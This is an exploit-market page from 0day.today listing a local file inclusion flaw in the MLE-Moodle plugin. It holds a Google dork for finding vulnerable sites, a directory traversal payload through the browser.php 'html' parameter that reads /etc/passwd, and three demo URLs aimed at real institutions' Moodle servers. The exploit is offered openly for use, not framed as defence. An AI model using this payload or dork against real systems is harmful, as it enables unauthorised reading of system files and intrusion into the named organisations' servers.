[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MLE-Moodle 0.8.8.4 <= Local File Inclusion Vulnerability

Author
GoLd_M
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20013
Category
web applications
Date add
20-12-2012
Platform
php
# Exploit Title: MLE-Moodle 0.8.8.4 <= Local File Inclusion Vulnerability
# Date: 19/12/2012
# Author: GoLd_M (Libyan) Page FaceBook (http://www.facebook.com/pages/وَذَكِّـــرْ/337878286310383)
# Version: 2.3.0
# Category:: Local File Disclosure Vulnerability
# Google Dork: intext:Powered by MLE-Moodle inurl:/blocks/mle/browser.php 
# Tested on: Xp SP 2
# Ex :[MLE-Moodle 0.8.8.4]/blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd
# Demo:
# 01 :http://vsmle.elibera.com/moodle//blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd
# 02 :http://moodle.sun.ac.za/blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd
# 03 :http://tecnoeduca.uap.edu.ar/blocks/mle/browser.php?html=../../../../../../../../../../../../../etc/passwd

#  0day.today [2024-07-07]  #